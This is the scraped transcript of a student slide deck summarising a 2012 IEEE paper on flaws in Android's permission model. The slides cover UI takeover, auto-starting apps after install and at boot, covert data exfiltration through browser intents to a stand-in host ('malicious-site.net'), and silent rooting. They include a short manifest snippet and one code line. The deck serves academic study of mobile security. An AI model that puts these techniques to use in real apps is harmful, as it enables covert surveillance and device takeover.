messing with android's permission model
DESCRIPTION
Messing with Android's Permission Model. 出處: 2012 IEEE 11th International Conference on Trust, Security and Privacy in Computing and Communications 作者: Andr’e Egners , Ulrike Meyer , Bjorn Marschollek 組員 : 9720114 王人弘 9820117 陳冠謀 9862218 盧軒偉. Outline. Introduction Related work - PowerPoint PPT PresentationTRANSCRIPT
Messing with Android's Permission
Model出處: 2012 IEEE 11th International Conference on Trust, Security
and Privacy in Computing and Communications作者: Andr’e Egners, Ulrike Meyer , Bjorn Marschollek組員: 9720114 王人弘 9820117 陳冠謀 9862218 盧軒偉
Outline1. Introduction2. Related work3. Overview on Android4. Android’s permission model5. Attacks
1. UI takeover2. Starting Applications after Installation3. Starting Applications at Boot4. E.T. Calling Home5. Silently Rooting Android
6. Conclusion 2/23
I. INTRODUCTION
在行動裝置上安裝 APP 時,通常會跳出對話框,要求使用者接受程式所請求的權限或是停止安裝。 使用者對於給予的權限可能會造成什麼風險並不清楚。 Permission Model 的設計上,各種選項的精細程度和可變程度太小,這使攻擊者容易繞過 Permission Model 的控管。 本篇會介紹 Android 的 Permission Model 及一些攻擊的方式。
3/23
II. RELATED WORK
殭屍網路 (botnet) Inter-Application communication Permissions of Android apps 其他安全機制與系統漏洞的相關議題
4/23
III. OVERVIEW ON ANDROID
Based on 2.6 Linux kernel
具有 Linux 的優點 (file, memory management) 和 Java類型的安全性
5/23
III. OVERVIEW ON ANDROID (Cont.)
6/23
III. OVERVIEW ON ANDROID (Cont.)
最底層是 Linux kernel ,包含 process 和 memory 的管理、各種驅動程式……。針對行動裝置的需求進行優化。 第二層是各種函式庫,包含 C library ,圖形的 2D/3D-
graphic library ,整理檔案資料的 SQLite...… 。 同樣在第二層的還有 Android runtime 所需要的東西,主要是 Dalvik Virtual Machine ,由 Java Virtual Machine衍生而來,更適合用在資源有限的裝置上。
7/23
III. OVERVIEW ON ANDROID (Cont.)
Application Framework Layer :提供 API 給應用程式的開發者使用。其中包含了 Package Manager ( 追蹤管理應用程式和它的資料 ) 、 Location Manager ( 管理應用程式的位置 ) 、 View System (UI 、繪圖 ) …… 。 最上層是應用程式所在的地方, third-party applications都在這層。可以使用下面的框架、函式庫……。
8/23
IV. ANDROID’S PERMISSION MODEL
API version 11,116 different permissions are predefine Ex. INTERNET – allow accessing the Internet RECEIVE_SMS – for monitoring, recording, or processing incoming
SMS RECORD_AUDIO – for recording audio messages
Ex. Tetris game request Internet is reasonable but suspicious if it would also requested the permission to read the address book
9/23
URI Permissions
Uniform Resource Identifier Applications may wish to pass a URI to another application in order to
be able to exchange data. For example, an email application usually protects its emails from
being read by other applications using additionally defined permissions.
a third-party image viewer should not hold the permissions to read emails directly.
image viewer should rather be handed a URI to the data by using the Intent.FLAG_GRANT_READ_URI_PERMISSION flag set by the callee of the function. This enables the receiver, i.e., the image viewer, to read the data at the given URI.
10/23
Permission protection level
Level zero – normal permissions ,low risk setting timer, making the phone vibrate
the user can request to be notified of the permission request prior to the installation of the application.
Level one – dangerous permissions ,high risk initiating phone calls, access to the device’s sensors, the Internet, or sensitive user data, read log file Prior to the installation, installer displays the set of requested dangerous
permissions to the user, which decides to either grant or deny the set permissions Only if the user gives his consent to all of the requested permissions, the application can successfully be installed.
11/23
Permission protection level (Cont.)
Level two – signature permissions only if the requesting application is signed with the same certificate as the application that declared the permission
user agree but no signature cannot be granted Level three – signatureOrSystem only to applications that are in the Android system
image or that are signed with the same certificates .
12/23
Permission protection level (Cont.)
some flaws the user is only able to grant or deny all permissions at once. granting or denying a particular permission is not possible. refraining from installing an application which might be useful, but
requests too many or a suspicious set of permissions.
Tetris example
13/23
Known Vulnerabilities
Log permissions
FAT32 formatted SD cards
WebKit browser
Most uncovered the past years
14/23
V. ATTACKS
1.Taking over the UI2.Starting directly after installation3.Also starting at boot4.Two-way Internet communication5.Silently rooting the device
An attack path to silently root android
15/23
1.UI takeover• KeyIntercepter
- onKeyDown() : handle or pass
- handle them but doing nothing
• The Home button
- Return to Home screen or Show a list of the recently used
• Installing from Android Market
- The install button -??-> The OK button
16/23
2.Starting Applications after Installation• Would the user start the app?
• to receive the INSTALL_REFERRER intent
- Google Analytics SDK
- chosen by the attacker
17/23
2.Starting Applications after Installation (Cont.)<receiver
Android:name=“com.google.android.apps.analytics.AnalyticsReceiver”
Android:exported=“true” >
<intent-filter>
<action android:nace=“com.android.vending.INSTALL_REFERRER”/>
</intent-filter>
</receiver>
18/23
3.Starting Applications at Boot BOOT_COMPLETED intent Permission –RECEIVE_BOOT_COMPLETED is introduced to
prevent from illegitimately starting at system boot... but is forgotten
Successfully listenning for the intent without asking for permission
19/23
4.E.T. Calling Home Establishing bidiectional outside communication e.g. a specified dropzone delivering user data , or a command & control server of a botnet-----------------------------VIEW
intent---------------------------------------------startActivity(new Intent(Intent.ACTION_VIEW, Uri. Parse(''http://malicious-site.net'')). setFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
20/23
4.E.T. Calling Home (Cont.) Request HTTP GET to send data URI schemes : deliver data to applications SilentCommunicator- screen off: start the transmission- screen on: browser hide
21/23
5.Silently Rooting Android
modified zimperlich-jailbreak:each instance runs with root privileges
setuid() calls which intended to change the owner to the user but has been assigned to the calling application -> fail
infinite loop which executes the native code until exception Root user can install app and the device owner will not notice!
22/23
VI. CONCLUSION
本篇文章提供了一些 Android 權限模型的漏洞。攻擊者可藉由這些漏洞,偷偷的建立雙向的通道,並下載額外的攻擊。更可以利用不令人起疑的授權請求,來做更複雜的攻擊。
23/23